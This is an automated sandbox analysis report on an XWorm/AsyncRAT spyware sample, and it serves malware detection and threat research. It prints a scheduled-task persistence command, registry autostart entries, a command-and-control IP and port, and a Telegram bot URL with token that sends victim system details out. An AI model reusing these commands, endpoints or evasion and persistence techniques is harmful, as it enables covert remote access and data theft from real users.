Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File Volume queried: C:\ FullSizeInformation
Source: svchost.exe.0.dr | Binary or memory string: vmware
Source: svchost.exe.0.dr | Binary or memory string: Quf7Q3Zt3QDCV4GUwvAb8GR9kDgPDvG2RqHE7VHvmcihFjJIvnIjGZFVuxgK
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4140218363.000000001BD56000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Code function: 0_2_00007FFD9B8B7BE1 CheckRemoteDebuggerPresent, 0_2_00007FFD9B8B7BE1
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"

Language, Device and Operating System Detection

Source: Yara match | File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Queries volume information: C:\Users\user\Desktop\WV7Gj9lJ7W.exe VolumeInformation
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4134841867.0000000001193000.00000004.00000020.00020000.00000000.sdmp, WV7Gj9lJ7W.exe, 00000000.00000002.4140218363.000000001BD56000.00000004.00000020.00020000.00000000.sdmp, WV7Gj9lJ7W.exe, 00000000.00000002.4141955412.000000001C780000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
MITRE ATT&CK Matrix (the number in parentheses after a technique is the report's count of matched signatures for it; techniques without a number were not matched)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation (12), Scheduled Task/Job (1), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (21), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1), Process Injection (11), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (21), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Software Packing (2), DLL Side-Loading (1), Masquerading (11), Virtualization/Sandbox Evasion (151), Process Injection (11)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: File and Directory Discovery (1), System Information Discovery (23), Query Registry (1), Security Software Discovery (541), Process Discovery (1), Virtualization/Sandbox Evasion (151), Application Window Discovery (1), System Network Configuration Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (11), Clipboard Data (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Web Service (1), Ingress Tool Transfer (3), Encrypted Channel (11), Non-Standard Port (1), Non-Application Layer Protocol (3), Application Layer Protocol (14), Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph ID: 1561588, Sample: WV7Gj9lJ7W.exe, Start date: 23/11/2024, Architecture: WINDOWS, Score: 100

• Contacted hosts: api.telegram.org (Uses the Telegram API (likely for C&C communication)); ip-api.com
• Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures
• Processes started: WV7Gj9lJ7W.exe; svchost.exe; svchost.exe; 5 other processes
• WV7Gj9lJ7W.exe, network: ip-api.com 208.95.112.1, 49730, 80 (TUT-ASUS, United States); api.telegram.org 149.154.167.220, 443, 49731 (TELEGRAMRU, United Kingdom); 104.198.168.179, 1337, 49732 (GOOGLEUS, United States)
• WV7Gj9lJ7W.exe, dropped file: C:\Users\user\AppData\Local\...\svchost.exe (PE32)
• WV7Gj9lJ7W.exe, signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
• WV7Gj9lJ7W.exe started schtasks.exe; schtasks.exe started conhost.exe
• svchost.exe, signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

Source | Detection | Scanner | Label
WV7Gj9lJ7W.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
WV7Gj9lJ7W.exe | 100% | Avira | TR/Spy.Gen
WV7Gj9lJ7W.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\svchost.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
104.198.168.179 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer | false | | high
127.0.0.1 | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
104.198.168.179 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot | WV7Gj9lJ7W.exe, svchost.exe.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | WV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.198.168.179 | unknown | United States | 15169 | GOOGLEUS | false
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1561588
                                                Start date and time:2024-11-23 21:04:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 37s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:WV7Gj9lJ7W.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@11/4@2/3
                                                EGA Information:
                                                • Successful, ratio: 12.5%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 96
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target svchost.exe, PID 1720 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 2448 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 3868 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 5216 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 6044 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 7164 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 984 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • VT rate limit hit for: WV7Gj9lJ7W.exe
Time | Type | Description
15:05:06 | API Interceptor | 12188108x Sleep call for process: WV7Gj9lJ7W.exe modified
20:05:06 | Task Scheduler | Run new task: svchost path: C:\Users\user\AppData\Local\Temp\svchost.exe
20:05:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\Temp\svchost.exe
20:05:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\Temp\svchost.exe
20:05:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | 18sFhgSyVK.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | UH7iNNKgPW.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | cmd.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Wire slip account payable.pif.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | HnJdZm51Xl.exe | malicious | Amadey, Clipboard Hijacker | ip-api.com/line/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | 18sFhgSyVK.exe | malicious | XWorm | 208.95.112.1
ip-api.com | UH7iNNKgPW.exe | malicious | XWorm | 208.95.112.1
ip-api.com | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | cmd.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Wire slip account payable.pif.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown | 208.95.112.2
api.telegram.org | 18sFhgSyVK.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | sosoliso.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | file.exe | malicious | Amadey, XWorm | 149.154.167.220
api.telegram.org | file.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
api.telegram.org | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
api.telegram.org | order requirements CIF-TRC809945210.exe | malicious | GuLoader | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | 18sFhgSyVK.exe | malicious | XWorm | 149.154.167.220
TELEGRAMRU | 21Installer.exe | malicious | Stealc, Vidar | 149.154.167.99
TELEGRAMRU | SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | sosoliso.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Amadey, XWorm | 149.154.167.220
TELEGRAMRU | file.exe | malicious | XWorm | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
TELEGRAMRU | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
TUT-ASUS | 18sFhgSyVK.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | UH7iNNKgPW.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | cmd.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Wire slip account payable.pif.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown | 208.95.112.2
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 18sFhgSyVK.exe | malicious | XWorm | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | kwlYObMOSn.exe | malicious | XWorm | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | psol.txt.ps1 | malicious | LummaC | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Setup.exe | malicious | LummaC | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe | malicious | XWorm | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC Stealer | 149.154.167.220
                                                No context
                                                Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.380476433908377
                                                Encrypted:false
                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                Process:C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                File Type:Generic INItialization configuration [WIN]
                                                Category:modified
                                                Size (bytes):64
                                                Entropy (8bit):3.6722687970803873
                                                Encrypted:false
                                                SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                MD5:DE63D53293EBACE29F3F54832D739D40
                                                SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                Process:C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):85504
                                                Entropy (8bit):6.005743319817595
                                                Encrypted:false
                                                SSDEEP:1536:z/gewX/1Z/xxwvHTLWdEjLHJbE8/8VSpKcaBMFi4OQDYviDUpe:z/g9XNZyTLNtbE8/PNaBSi4OTze
                                                MD5:F5869349B4C3C5902601673CCB454F8C
                                                SHA1:0B164E7101927FE06DDBB98B0A85BDD7757F1734
                                                SHA-256:45B4E53E206933804C6FEBFCD5BDDC27599C63AAAA2921AFACC4D7F52A853F3A
                                                SHA-512:2B6EC9FE1F7D4F9D2884AF9D2274C62492555835533864E7C8998461C5598E6C999401D4EA33AF0404E461C6EF2671BC0C8100C6FA244A35FAAC9224BC012712
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 76%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag.................D...........b... ........@.. ....................................@..................................b..S.................................................................................... ............... ..H............text....C... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B.................b......H.......Hh..`.......&.....................................................(....*.r...p*. T...*..(....*.r+..p*. ..e.*.s.........s.........s.........s.........*.rU..p*. .O..*.r...p*.r...p*. ...*.r...p*. R...*.r...p*. ..|.*..((...*.r...p*. ?...*.r4..p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(^...*"(....+.*"(....+.*&(7...&+.*.+5sl... .... .'..om...(,...~....-.(b...(T...~....on...&.-.*.r...p*. ....*.r...p*. ...*.r...p*. .x!.*.r...p*.r2..p*. ....*.r\..p*. ....*.r...p*.
                                                Process:C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:05:05 2024, mtime=Sat Nov 23 19:05:05 2024, atime=Sat Nov 23 19:05:05 2024, length=85504, window=hide
                                                Category:dropped
                                                Size (bytes):1052
                                                Entropy (8bit):4.976805859422824
                                                Encrypted:false
                                                SSDEEP:12:8OqkT+4onWCedaGpMXRawJgK/PcmjAWZfE1HgUNwuLEFU44t2YZ/elFlSJmZmV:80oWhyXRDJgK/XAsfEV7kFDqyFm
                                                MD5:2C93CB9F77378DFD9BF306193F90FA57
                                                SHA1:06D6068777218318DA632A4252ABED3022832C00
                                                SHA-256:CE266DEBADEEF70423058B8BA424B1E1E099061D7C6EF8506B769FA28837DB41
                                                SHA-512:347CE16914FDA7CE4DB36E7B256E1F950A62B94B92FC4B2524E30B40E00F80CE55E7728AA46FC2C2CBF68B9FB89D23B595C5F5A557FA174D1148CE4E8F82B2D7
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.... .....1..=....1..=....1..=...N........................:..DG..Yr?.D..U..k0.&...&......vk.v......j..=....^..=......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^wY.............................%..A.p.p.D.a.t.a...B.P.1.....wY....Local.<......CW.^wY......b.....................x...L.o.c.a.l.....N.1.....wY....Temp..:......CW.^wY......l.....................Qy..T.e.m.p.....b.2..N..wY.. .svchost.exe.H......wY..wY............................OX(.s.v.c.h.o.s.t...e.x.e.......\...............-.......[.............0......C:\Users\user\AppData\Local\Temp\svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.s.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......494126...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD.
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.005743319817595
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:WV7Gj9lJ7W.exe
                                                File size:85'504 bytes
                                                MD5:f5869349b4c3c5902601673ccb454f8c
                                                SHA1:0b164e7101927fe06ddbb98b0a85bdd7757f1734
                                                SHA256:45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a
                                                SHA512:2b6ec9fe1f7d4f9d2884af9d2274c62492555835533864e7c8998461c5598e6c999401d4ea33af0404e461c6ef2671bc0c8100c6fa244a35faac9224bc012712
                                                SSDEEP:1536:z/gewX/1Z/xxwvHTLWdEjLHJbE8/8VSpKcaBMFi4OQDYviDUpe:z/g9XNZyTLNtbE8/PNaBSi4OTze
                                                TLSH:A8839E2C77EA0529E5FFAFB51CF13256CB75F6231903D61F24C602CA1613A89CD81AE9
